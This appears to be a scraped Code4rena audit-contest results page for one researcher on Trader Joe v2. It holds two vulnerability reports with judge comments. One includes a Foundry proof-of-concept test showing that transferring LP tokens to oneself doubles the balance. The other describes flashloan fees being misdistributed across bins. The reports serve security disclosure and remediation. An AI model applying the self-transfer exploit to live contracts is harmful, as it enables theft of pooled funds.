Trader Joe v2 contest - parashar's results

One-stop-shop decentralized trading on Avalanche.

General Information

Platform: Code4rena

Start Date: 14/10/2022

Pot Size: $100,000 USDC

Total HM: 12

Participants: 75

Period: 9 days

Judge: GalloDaSballo

Total Solo HM: 1

Id: 171

League: ETH

Trader Joe

Findings Distribution

Researcher Performance

Rank: 33/75

Findings: 2

Award: $69.83

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest Page Github Contest Repository Github Findings Repository Trader Joe

Findings Information

🌟 Selected for report: Dravee

Also found by: 8olidity, JMukesh, Lambda, Randyyy, RaoulSchaffranek, SEVEN, Tutturu, __141345__, bitbopper, cccz, hansfriese, hxzy, ne0n, neumo, parashar, phaze, saian

Awards

0.3268 USDC - $0.33

Labels

bug

3 (High Risk)

satisfactory

duplicate-299

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2022-10-traderjoe/blob/main/src/LBToken.sol#L189

Vulnerability details

Impact

User can keep transferring tokens to himself and keep doubling his balance on each transfer, as a result with manipulated LP balance he can withdraw pool tokens

Proof of Concept

Run this test in LBToken.t.sol, which passes, essentially doubling DEV balance

function testSafeTransferToSelf() public {
      uint256 amountIn = 1e18;

      (uint256[] memory _ids, , , ) = addLiquidity(amountIn, ID_ONE, 5, 0);

      uint256[] memory amounts = new uint256[](5);
      for (uint256 i; i < 5; i++) {
          assertEq(pair.userPositionAtIndex(DEV, i), _ids[i]);
          amounts[i] = pair.balanceOf(DEV, _ids[i]);
      }
      assertEq(pair.userPositionNumber(DEV), 5);

      assertEq(pair.balanceOf(DEV, ID_ONE - 1), amountIn / 3);
      emit TransferSingle(DEV, DEV, ALICE, _ids[0], amounts[0]);
      pair.safeTransferFrom(DEV, DEV, _ids[0], amounts[0]);
      assertEq(pair.balanceOf(DEV, _ids[0]), 2*amounts[0]);

  }

Tools Used

Foundry

Recommended Mitigation Steps

https://github.com/code-423n4/2022-10-traderjoe/blob/main/src/LBToken.sol#L189

    unchecked {
            _balances[_id][_to] = _toBalance + _amount;
            _balances[_id][_from] = _fromBalance - _amount;
        }

#0 - trust1995
2022-10-23T21:37:54Z

Dup of #422

#1 - GalloDaSballo
2022-10-26T16:35:59Z

Dup of https://github.com/code-423n4/2022-10-traderjoe-findings/issues/299

#2 - c4-judge
2022-11-23T18:28:37Z

GalloDaSballo marked the issue as not a duplicate

#3 - c4-judge
2022-11-23T18:29:19Z

GalloDaSballo marked the issue as duplicate of #299

#4 - Simon-Busch
2022-12-05T06:39:14Z

Marked this issue as Satisfactory as requested by @GalloDaSballo

Findings Information

🌟 Selected for report: shung

Also found by: 0x52, KingNFT, Trust, parashar, philogy, rvierdiiev

Labels

bug

2 (Med Risk)

satisfactory

duplicate-136

Awards

69.4984 USDC - $69.50

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2022-10-traderjoe/blob/main/src/LBPair.sol#L452

Vulnerability details

Impact

Flashloan fees not distributed to LP correctly

Proof of Concept

While taking flashloan reserves across various bins are being used, but while distributing fees, it is only being distributed to LP of active bin id, which can be used by contract using flashloan to minimize the fees paid by him

Tools Used

Recommended Mitigation Steps

While distributing fees, it should distribute based on reserves used across bins.

#0 - Shungy
2022-10-23T21:13:22Z

I believe this finding to be valid. However the report is lacking in elaborating the issue.

Duplicate: https://github.com/code-423n4/2022-10-traderjoe-findings/issues/136

#1 - GalloDaSballo
2022-10-26T17:03:03Z

Dup of https://github.com/code-423n4/2022-10-traderjoe-findings/issues/136

#2 - c4-judge
2022-11-13T17:19:51Z

GalloDaSballo marked the issue as satisfactory

#3 - c4-judge
2022-11-16T21:53:36Z

GalloDaSballo marked the issue as not a duplicate

#4 - c4-judge
2022-11-16T21:53:43Z

GalloDaSballo marked the issue as duplicate of #136

Trader Joe v2 contest - parashar's results

One-stop-shop decentralized trading on Avalanche.

General Information

Findings Distribution

Researcher Performance

External Links

[H-01] User can double his balance by transferring token to himself as many time as he wishes - $0.33

Findings Information

Awards

Labels

External Links

Lines of code

Vulnerability details

Impact

Proof of Concept

Tools Used

Recommended Mitigation Steps

#0 - trust19952022-10-23T21:37:54Z

#1 - GalloDaSballo2022-10-26T16:35:59Z

#2 - c4-judge2022-11-23T18:28:37Z

#3 - c4-judge2022-11-23T18:29:19Z

#4 - Simon-Busch2022-12-05T06:39:14Z

[M-03] Incorrect flashloan fee distribution - $69.50

Findings Information

Labels

Awards

External Links

Lines of code

Vulnerability details

Impact

Proof of Concept

Tools Used

Recommended Mitigation Steps

#0 - Shungy2022-10-23T21:13:22Z

#1 - GalloDaSballo2022-10-26T17:03:03Z

#2 - c4-judge2022-11-13T17:19:51Z

#3 - c4-judge2022-11-16T21:53:36Z

#4 - c4-judge2022-11-16T21:53:43Z

#0 - trust1995
2022-10-23T21:37:54Z

#1 - GalloDaSballo
2022-10-26T16:35:59Z

#2 - c4-judge
2022-11-23T18:28:37Z

#3 - c4-judge
2022-11-23T18:29:19Z

#4 - Simon-Busch
2022-12-05T06:39:14Z

#0 - Shungy
2022-10-23T21:13:22Z

#1 - GalloDaSballo
2022-10-26T17:03:03Z

#2 - c4-judge
2022-11-13T17:19:51Z

#3 - c4-judge
2022-11-16T21:53:36Z

#4 - c4-judge
2022-11-16T21:53:43Z